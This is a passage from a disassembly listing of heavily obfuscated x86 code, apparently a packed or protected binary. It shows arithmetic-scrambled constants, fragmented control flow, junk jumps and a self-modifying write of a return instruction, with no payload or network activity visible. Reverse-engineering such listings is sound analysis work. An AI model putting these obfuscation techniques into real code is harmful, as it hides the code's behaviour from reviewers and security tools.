; END OF FUNCTION CHUNK FOR sub_43DBEC
; =============== S U B R O U T I N E =======================================
sub_44C42A proc near ; CODE XREF: ut7h7i2x:0043FE6Bj
; sub_440944+9569p
xchg edx, [esp+0]
pop edx
call sub_43AA94
sub eax, 13DB2Bh
rol eax, 0Ah
add eax, 84C33CCAh
rol eax, 1Dh
jmp loc_440845
sub_44C42A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
locret_44C44A: ; CODE XREF: ut7h7i2x:loc_44D07Dj
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445235
loc_44C44B: ; CODE XREF: sub_445235:loc_452786j
jz loc_441EB9
jmp loc_4538D3
; END OF FUNCTION CHUNK FOR sub_445235
; ---------------------------------------------------------------------------
ror esi, 1Ch
jmp sub_451A5A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444A12
loc_44C45E: ; CODE XREF: sub_444A12:loc_44EE4Dj
mov esi, [ecx]
xchg edi, eax
loc_44C462: ; CODE XREF: ut7h7i2x:0044278Cj
or ebp, edx
jmp loc_44F7E5
; END OF FUNCTION CHUNK FOR sub_444A12
; ---------------------------------------------------------------------------
rol ecx, 0Dh
ja loc_446A87
jmp sub_44C791
; ---------------------------------------------------------------------------
adc ebx, eax
add edi, ebp
jmp sub_457B87
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E68B
loc_44C480: ; CODE XREF: sub_43E68B+1A9A6j
push ecx
cmp eax, ecx
jmp loc_44999D
; END OF FUNCTION CHUNK FOR sub_43E68B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44640F
loc_44C488: ; CODE XREF: sub_44640F-CA30j
; sub_44640F:loc_443EBCj
call sub_443A06
loc_44C48D: ; CODE XREF: ut7h7i2x:00442A3Cj
jmp loc_44800D
; END OF FUNCTION CHUNK FOR sub_44640F
; ---------------------------------------------------------------------------
loc_44C492: ; DATA XREF: sub_44B87B:loc_44F637o
jns loc_44D11D
sub ebx, 10000h
mov eax, [ebx]
neg eax
cmp ax, 0A5B3h
jmp loc_44D116
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44124A
loc_44C4AB: ; CODE XREF: sub_44124A:loc_457DDCj
or edi, 0D0EB3FC4h
and edi, 426309AAh
add edi, 0BFE21904h
xchg edi, [esp-4+arg_0]
jmp sub_43F058
; END OF FUNCTION CHUNK FOR sub_44124A
; ---------------------------------------------------------------------------
loc_44C4C5: ; DATA XREF: sub_44749D+Ao
mov [ebp-4], eax
push 0F343E43Ch
loc_44C4CD: ; CODE XREF: ut7h7i2x:loc_439E14j
pop eax
or eax, 0ED5DF11Ah
sub eax, 2680DC9Ah
add eax, 356F7BEEh
jmp loc_452FCC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_44C4E5: ; CODE XREF: sub_43AB62+154B0j
jz loc_4518E6
jmp loc_43AFB3
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444273
loc_44C4F0: ; CODE XREF: sub_444273:loc_4471BCj
jz loc_44BE57
jmp loc_44514E
; END OF FUNCTION CHUNK FOR sub_444273
; ---------------------------------------------------------------------------
loc_44C4FB: ; DATA XREF: sub_449231:loc_455F9Do
cmp ds:dword_43AF9C, 0
jnz loc_43E5BC
jmp loc_43C33F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_44C50D: ; CODE XREF: sub_43FF65+E394j
jl loc_452D11
loc_44C513: ; CODE XREF: sub_44928D:loc_4459D5j
xor ecx, 2E747356h
xchg ecx, [esp+0]
push 10h
mov eax, [ebp+8]
push ebx
mov ebx, eax
xchg ebx, [esp+8+var_8]
jmp loc_458F83
; END OF FUNCTION CHUNK FOR sub_43FF65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446320
loc_44C52C: ; CODE XREF: sub_43EB8A:loc_442F00j
; sub_446320+256Bj ...
push offset loc_4571A8
jmp nullsub_86
; END OF FUNCTION CHUNK FOR sub_446320
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452C66
loc_44C536: ; CODE XREF: sub_452C66+6j
pop ebx
and ebx, 9F15E32Ah
or ebx, 40A52EC2h
and ebx, 61A840B6h
loc_44C549: ; CODE XREF: sub_4503C3:loc_451E65j
jmp loc_44E4F9
; END OF FUNCTION CHUNK FOR sub_452C66
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F738
loc_44C54E: ; CODE XREF: sub_44F738-445Dj
jnz loc_451173
xor ebp, 40A8C90Bh
loc_44C55A: ; CODE XREF: sub_44F738:loc_452A85j
call sub_453D8B
mov edx, 0C90D1845h
call sub_44ED9F
jmp loc_44701B
; END OF FUNCTION CHUNK FOR sub_44F738
; ---------------------------------------------------------------------------
loc_44C56E: ; CODE XREF: ut7h7i2x:0043F20Dj
cdq
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_44C56F: ; CODE XREF: sub_43AA94+49B1j
add esi, 2AEF2B51h
xchg esi, [esp-8+arg_4]
jmp loc_44419E
; END OF FUNCTION CHUNK FOR sub_43AA94
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4462B0
loc_44C57D: ; CODE XREF: sub_4462B0:loc_4547AAj
xchg ecx, [edx]
test esi, 2DDA31F0h
jmp loc_43BE79
; END OF FUNCTION CHUNK FOR sub_4462B0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_516. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4443DE
loc_44C58B: ; CODE XREF: sub_4443DE+138D4j
jmp loc_4532AC
; END OF FUNCTION CHUNK FOR sub_4443DE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A8C1
loc_44C590: ; CODE XREF: sub_45A8C1-1DC60j
jmp loc_44975D
; END OF FUNCTION CHUNK FOR sub_45A8C1
; =============== S U B R O U T I N E =======================================
sub_44C595 proc near ; CODE XREF: ut7h7i2x:00441C49j
; sub_439BF8+1A322p
; FUNCTION CHUNK AT 0043A33A SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00443936 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00445F55 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044893E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A074 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
mov eax, [eax]
movzx eax, word ptr [eax+6]
push edx
mov edx, esi
call sub_445B34
loc_44C5A7: ; CODE XREF: sub_44F9A1+2156j
xchg ebp, eax
loc_44C5A9: ; CODE XREF: sub_44F9A1:loc_43DEDFj
push edi
push 761C6B8Fh
pop edi
jmp loc_44893E
sub_44C595 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E2E0
loc_44C5B5: ; CODE XREF: sub_44E2E0-8C43j
push offset loc_44194B
jmp nullsub_475
; END OF FUNCTION CHUNK FOR sub_44E2E0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C39B
loc_44C5BF: ; CODE XREF: sub_43C39B+9BE0j
mov esi, edx
xchg esi, [esp+0]
call sub_4396F5
mov eax, 1AABF86Ch
jmp sub_457FDD
; END OF FUNCTION CHUNK FOR sub_43C39B
; ---------------------------------------------------------------------------
loc_44C5D3: ; CODE XREF: ut7h7i2x:00455770j
jno loc_43FC98
; =============== S U B R O U T I N E =======================================
sub_44C5D9 proc near ; CODE XREF: sub_43B7C7+7p
; FUNCTION CHUNK AT 0043D9C8 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044CE62 SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
push 9E2E3BACh
call sub_44B789
loc_44C5E7: ; CODE XREF: sub_447267+1Aj
jmp loc_43D9C8
sub_44C5D9 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445AD1
loc_44C5EC: ; CODE XREF: sub_445AD1:loc_451B69j
sub eax, 47AA4A39h
xor eax, 0E40775Dh
ror eax, 19h
xor eax, 0BFD17D46h
add eax, 5EF8A3D3h
mov edx, [esp+0]
push ecx
mov ecx, eax
jmp loc_43E65E
; END OF FUNCTION CHUNK FOR sub_445AD1
; ---------------------------------------------------------------------------
locret_44C612: ; CODE XREF: ut7h7i2x:loc_45AA7Bj
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4396F5
loc_44C613: ; CODE XREF: sub_4396F5+16F27j
jmp loc_43A630
; END OF FUNCTION CHUNK FOR sub_4396F5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E3B1
loc_44C618: ; CODE XREF: sub_44E3B1+18j
xchg edx, [esp+4+var_4]
jmp loc_45AE31
; END OF FUNCTION CHUNK FOR sub_44E3B1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_536. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C99C
loc_44C621: ; CODE XREF: sub_44C99C+633Fj
jmp loc_441980
; END OF FUNCTION CHUNK FOR sub_44C99C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DCFF
loc_44C626: ; CODE XREF: sub_43DCFF+48D8j
jmp sub_43CA2D
; END OF FUNCTION CHUNK FOR sub_43DCFF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45002D
loc_44C62B: ; CODE XREF: ut7h7i2x:0043F32Fj
; sub_45002D:loc_44CB07j
push 0BB3005C9h
pop esi
and esi, 0CCE27302h
xor esi, 0B377D0A6h
add esi, 0C4EDA057h
loc_44C643: ; CODE XREF: sub_459111:loc_457A8Ej
jmp loc_4474CD
; END OF FUNCTION CHUNK FOR sub_45002D
; ---------------------------------------------------------------------------
loc_44C648: ; DATA XREF: sub_44E261+5o
push ecx
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_44C649: ; CODE XREF: sub_43AB62:loc_44E083j
mov ecx, [esp-4+arg_10]
loc_44C64D: ; CODE XREF: ut7h7i2x:loc_43B20Fj
mov dword ptr [ecx], 10001h
lea eax, sub_4427A1
jmp loc_443759
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
loc_44C65E: ; DATA XREF: sub_452B4F-3BE7o
call sub_453D8B
mov edx, 0CB39536Bh
push ecx
mov ecx, ebx
jmp loc_44095B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D6FD
loc_44C670: ; CODE XREF: sub_44D6FD+Fj
push 36C9D77Dh
pop eax
and eax, 3E20528Fh
rol eax, 4
add eax, 0A03F4C67h
xchg eax, [esp+0]
jmp sub_43AA94
; END OF FUNCTION CHUNK FOR sub_44D6FD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456E7D
loc_44C68D: ; CODE XREF: sub_456E7D-1CEF0j
and eax, 0FC6DC79Ah
sub eax, 44771D5Bh
jb loc_441AAE
add esi, 0DEC62791h
jmp loc_441AA7
; END OF FUNCTION CHUNK FOR sub_456E7D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BA9E
loc_44C6AA: ; CODE XREF: sub_43BA9E+173A6j
push offset sub_4523B3
jmp nullsub_394
; END OF FUNCTION CHUNK FOR sub_43BA9E
; =============== S U B R O U T I N E =======================================
sub_44C6B4 proc near ; DATA XREF: ut7h7i2x:0043F9B0o
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043BCF5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004469E6 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0045933E SIZE 0000000E BYTES
pop edx
jb loc_45933E
mov eax, [esp+0]
push edx
jmp loc_4469E6
sub_44C6B4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_44C6C4: ; CODE XREF: ut7h7i2x:00456BABj
jnb loc_4520C5
cmp esi, 0F9BE3C28h
jmp loc_4594BC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A4C0
loc_44C6D5: ; CODE XREF: sub_44A4C0+5j
lock xchg edx, [eax]
or edx, edx
jz nullsub_87
loc_44C6E0: ; CODE XREF: sub_44A4C0-4781j
; sub_451EDF+8j
jno loc_445D4A
push eax
push 0
jmp loc_445D36
; END OF FUNCTION CHUNK FOR sub_44A4C0
; ---------------------------------------------------------------------------
loc_44C6EE: ; CODE XREF: ut7h7i2x:loc_4413C5j
; ut7h7i2x:004413D2j
add esi, 7B43199Ch
xchg esi, [esp]
jmp loc_43D0C7
; ---------------------------------------------------------------------------
jmp ds:dword_41D148
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FCEE
loc_44C702: ; CODE XREF: sub_43FCEE-2312j
jmp nullsub_161
; END OF FUNCTION CHUNK FOR sub_43FCEE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_56. PRESS KEYPAD "+" TO EXPAND]
dd 823585h, 3130E900h
db 2 dup(0)
; ---------------------------------------------------------------------------
locret_44C712: ; CODE XREF: ut7h7i2x:004408F4j
retn
; ---------------------------------------------------------------------------
loc_44C713: ; DATA XREF: ut7h7i2x:004407F9o
push esi
push 8F3AE95Eh
pop esi
xor esi, 96BCF274h
add esi, 0E6BD8516h
call sub_43AA5E
; START OF FUNCTION CHUNK FOR sub_443BC5
loc_44C72B: ; CODE XREF: sub_443BC5+13A2Fj
jmp loc_453719
; END OF FUNCTION CHUNK FOR sub_443BC5
; ---------------------------------------------------------------------------
loc_44C730: ; CODE XREF: ut7h7i2x:004472C9j
jmp loc_447E60
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446CA0
loc_44C735: ; CODE XREF: sub_446CA0+CEABj
sbb ecx, 19E9F55Fh
sbb edi, 0FE341714h
cmp edi, ebx
jmp loc_44E7EB
; END OF FUNCTION CHUNK FOR sub_446CA0
; ---------------------------------------------------------------------------
loc_44C748: ; CODE XREF: ut7h7i2x:0045A172j
sub ecx, esi
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_44C74A: ; CODE XREF: sub_439BF8+1B57Bj
sub esi, 3960F105h
push offset loc_44DDCE
jmp nullsub_226
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441FAC
loc_44C75A: ; CODE XREF: sub_441FAC+3j
xchg ecx, [esp+4+var_4]
mov ebp, esp
push ecx
mov esp, ebp
xchg esi, [esp+8+var_8]
mov ebp, esi
; END OF FUNCTION CHUNK FOR sub_441FAC
; START OF FUNCTION CHUNK FOR sub_43CCC3
loc_44C767: ; CODE XREF: sub_43CCC3+1D2j
jmp loc_4571EE
; END OF FUNCTION CHUNK FOR sub_43CCC3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_44C76C: ; CODE XREF: sub_4524E2:loc_43BC80j
; sub_442B3B+1172Bj
mov edx, [ebp+8]
mov [edx-18h], eax
inc dword ptr [ebp-4]
mov eax, [ebp+8]
jmp loc_43B999
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A25C
loc_44C77D: ; CODE XREF: sub_45A25C:loc_43BDC9j
mov edx, eax
call sub_43F9C6
loc_44C784: ; DATA XREF: sub_452857:loc_456076o
mov ebp, esp
push ebp
mov ebp, ecx
xchg ebp, [esp+0]
jmp loc_4552BE
; END OF FUNCTION CHUNK FOR sub_45A25C
; =============== S U B R O U T I N E =======================================
sub_44C791 proc near ; CODE XREF: sub_452802-1172Dp
; ut7h7i2x:00441E5Aj ...
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0043B6BC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043CF58 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043E663 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043E7AA SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0043E7C6 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043E870 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043FE8B SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00440B44 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044170E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044486B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447125 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004472FD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004496EC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B114 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044B753 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044E56A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E6F1 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0045351D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045453C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004559A3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004559BD SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004565EB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457C94 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457D6C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457DE2 SIZE 0000000A BYTES
xchg edx, [esp+0]
pop edx
push edx
pop eax
pop edx
xchg ebx, [esp+0]
mov ebp, ebx
jmp loc_43FE8B
sub_44C791 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459FAF
loc_44C7A2: ; CODE XREF: sub_459FAF:loc_43E5B4j
push edx
push 35ED817Eh
pop edx
add edx, 10DBA4A4h
sub edx, 848DEF48h
push offset sub_43E617
jmp nullsub_476
; END OF FUNCTION CHUNK FOR sub_459FAF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4446B0
loc_44C7BF: ; CODE XREF: sub_4446B0:loc_453DE0j
mov edi, edx
xchg edi, [esp-4+arg_0]
push offset loc_44F54D
jmp nullsub_200
; END OF FUNCTION CHUNK FOR sub_4446B0
; ---------------------------------------------------------------------------
loc_44C7CE: ; CODE XREF: ut7h7i2x:loc_456334j
mov [ebx], eax
pop ebx
lea eax, sub_43B873
mov byte ptr [eax], 0C3h
jmp sub_43B873
; =============== S U B R O U T I N E =======================================
sub_44C7DF proc near ; CODE XREF: sub_41088C+9Bp
; ut7h7i2x:0043BCEFj
; DATA XREF: ...
call sub_457E3D
loc_44C7E4: ; CODE XREF: sub_448503+104B8j
jmp nullsub_89
sub_44C7DF endp
; ---------------------------------------------------------------------------
loc_44C7E9: ; CODE XREF: ut7h7i2x:loc_45495Fj
and esi, 8F86A843h
add esi, 0AD28B59Ah
add esi, ebp
add esi, 0C952A21Bh
mov [esi], eax
xchg ecx, [esp]
jmp loc_4586F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E700
loc_44C807: ; CODE XREF: sub_43E700+8635j
jnz loc_45297F
; END OF FUNCTION CHUNK FOR sub_43E700
; START OF FUNCTION CHUNK FOR sub_44D255
loc_44C80D: ; CODE XREF: sub_44D255-67E0j
jmp loc_456D16
; END OF FUNCTION CHUNK FOR sub_44D255
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CEF8
loc_44C812: ; CODE XREF: sub_43CEF8-38C9j
jmp sub_446215
; END OF FUNCTION CHUNK FOR sub_43CEF8
; ---------------------------------------------------------------------------
jnb loc_44A97F
cmp edx, ebp
jmp loc_448384
; ---------------------------------------------------------------------------
loc_44C824: ; CODE XREF: ut7h7i2x:00442537j
cmp ebx, eax
jmp loc_459FE3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446F56
loc_44C82B: ; CODE XREF: sub_446F56:loc_44DE82j
mov ecx, [edi]
cdq
jnb loc_459A81
popf
jmp loc_459F3F
; END OF FUNCTION CHUNK FOR sub_446F56
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439170
loc_44C83A: ; CODE XREF: sub_439170:loc_446210j
sub esi, 0B260DBBBh
loc_44C840: ; CODE XREF: ut7h7i2x:loc_44B589j
and esi, 0E454D72Bh
add esi, 359591CBh
popf
jmp loc_4441F3
; END OF FUNCTION CHUNK FOR sub_439170
; =============== S U B R O U T I N E =======================================
sub_44C852 proc near ; CODE XREF: ut7h7i2x:00440A44j
; sub_44DEFF-770Bp
; FUNCTION CHUNK AT 00439608 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043DDCE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441A88 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FB50 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004504CC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450E58 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045A050 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045A3CF SIZE 00000014 BYTES
xchg ecx, [esp+0]
pop ecx
push edx
push ebx
jmp loc_4504CC
sub_44C852 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44947D
loc_44C85D: ; CODE XREF: sub_44947D-2600j
jge loc_455BC1
loc_44C863: ; CODE XREF: sub_43CD08+1800Fj
jmp loc_459992
; END OF FUNCTION CHUNK FOR sub_44947D
; ---------------------------------------------------------------------------
test eax, ecx
jmp loc_454501
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_221. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_44C870: ; CODE XREF: ut7h7i2x:004500C6j
jmp loc_441806
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4396F5
loc_44C875: ; CODE XREF: sub_4396F5+B449j
jmp nullsub_6
; END OF FUNCTION CHUNK FOR sub_4396F5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A956
loc_44C87A: ; CODE XREF: sub_43A956+18j
jmp loc_44A08E
; END OF FUNCTION CHUNK FOR sub_43A956
; =============== S U B R O U T I N E =======================================
sub_44C87F proc near ; CODE XREF: sub_4549F0-4FFEp
; ut7h7i2x:00451EDAj
; FUNCTION CHUNK AT 0043BE0D SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043E5B9 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004400E9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044984C SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044B365 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00451EBB SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
push ecx
push 0E9061107h
pop ecx
add ecx, 0ED9E913h
xor ecx, 0BE14EDBh
add ecx, 404FADBh
jmp loc_451EBB
sub_44C87F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_44C8A1: ; CODE XREF: sub_439BF8:loc_456862j
; ut7h7i2x:004570E9j
rol esi, 10h
or esi, 6BC6E9C3h
rol esi, 12h
add esi, 8E69376h
xchg esi, [esp+0]
jmp loc_4456E1
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CE34
loc_44C8BB: ; CODE XREF: sub_43CE34+Bj
; sub_43D021+FA08j ...
jns loc_43BB6F
push esi
call sub_452B14
loc_44C8C7: ; CODE XREF: sub_43CE34+2834j
mov al, [eax]
mov edx, [ebp-20h]
mov [edx], al
inc dword ptr [ebp-20h]
mov eax, [ebp-1Ch]
cmp byte ptr [eax], 2Eh
jmp loc_43D90A
; END OF FUNCTION CHUNK FOR sub_43CE34
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445AD1
loc_44C8DC: ; CODE XREF: sub_445AD1:loc_454BD1j
push 812047BCh
pop ecx
and ecx, 0C1D29DC3h
sub ecx, 545F4E1Eh
jmp loc_439E6B
; END OF FUNCTION CHUNK FOR sub_445AD1
; =============== S U B R O U T I N E =======================================
sub_44C8F3 proc near ; CODE XREF: sub_45500F-176D9p
; ut7h7i2x:00455768j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043BE33 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043EE8A SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00442243 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444309 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0044B6A0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E60B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004505F9 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00450BDA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452AD7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453461 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00456DE0 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045A552 SIZE 00000005 BYTES
xchg ebx, [esp+4+var_4]
pop ebx
add esp, 0FFFFFFECh
cmp ds:dword_43A044, 0
jnz loc_453461
jmp loc_452AD7
sub_44C8F3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DD56
loc_44C90C: ; CODE XREF: sub_44DD56:loc_4459BCj
pushf
jmp sub_445235
; END OF FUNCTION CHUNK FOR sub_44DD56
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_44C912: ; CODE XREF: sub_439BF8+D6BCj
and edi, ebx
loc_44C914: ; CODE XREF: ut7h7i2x:loc_43CE17j
ror edx, 0Ah
jmp loc_439408
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455775
loc_44C91C: ; CODE XREF: sub_455775+4j
cmp dword ptr [ebp-4], 5
jnz loc_439408
jmp loc_44BC94
; END OF FUNCTION CHUNK FOR sub_455775
; =============== S U B R O U T I N E =======================================
sub_44C92B proc near ; DATA XREF: ut7h7i2x:00459ED5o
mov eax, [eax]
xchg eax, [esp+0]
call eax
mov [ebp-4], eax
sub_44C92B endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_444273
loc_44C935: ; CODE XREF: sub_444273:loc_44872Fj
jmp loc_458768
; END OF FUNCTION CHUNK FOR sub_444273
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A030
loc_44C93A: ; CODE XREF: sub_44A030+6j
inc ds:dword_443780
jmp loc_447316
; END OF FUNCTION CHUNK FOR sub_44A030
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C9F5
loc_44C945: ; CODE XREF: ut7h7i2x:00451EA4j
; sub_43C9F5+19B64j
or edi, 22D9F624h
and edi, 0EB0716F4h
push offset sub_451F7B
jmp nullsub_255
; END OF FUNCTION CHUNK FOR sub_43C9F5
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44C95B proc near ; CODE XREF: sub_442E76-4FB0j
retn
sub_44C95B endp
; =============== S U B R O U T I N E =======================================
sub_44C95C proc near ; CODE XREF: sub_442E76-4FB5p
; sub_43F7C8+3p ...
; FUNCTION CHUNK AT 0045630A SIZE 00000005 BYTES
js sub_4394AA
push ebp
mov ebp, esp
push offset loc_453067
jmp loc_45630A
sub_44C95C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F1B2
loc_44C96F: ; CODE XREF: sub_43F1B2:loc_44831Cj
jz loc_44B8A6
jmp loc_456BE8
; END OF FUNCTION CHUNK FOR sub_43F1B2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CE09
loc_44C97A: ; CODE XREF: sub_44CE09:loc_44A2B9j
; sub_44CE09-2B3Aj
add edx, 0BFFBDFE4h
xchg edx, [esp+4+var_4]
jmp loc_4422F8
; END OF FUNCTION CHUNK FOR sub_44CE09
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449B76
loc_44C988: ; CODE XREF: sub_449B76+13j
jnb loc_444E5B
cdq
adc ebx, ecx
xor ebp, 0D2882C65h
jmp loc_444E5B
; END OF FUNCTION CHUNK FOR sub_449B76
; =============== S U B R O U T I N E =======================================
sub_44C99C proc near ; DATA XREF: sub_45601B:loc_450800o
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00439298 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043AB9D SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00441980 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00448B0A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044C621 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004501A2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451AD6 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00452CD5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453FEC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045578E SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045747B SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00458C1B SIZE 00000005 BYTES
sub al, 99h
mov edx, [ebp-4]
imul byte ptr [edx]
cmp al, 0A4h
jz loc_448B0A
jmp loc_439298
sub_44C99C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_44C9B0: ; CODE XREF: sub_442B3B+14C4Dj
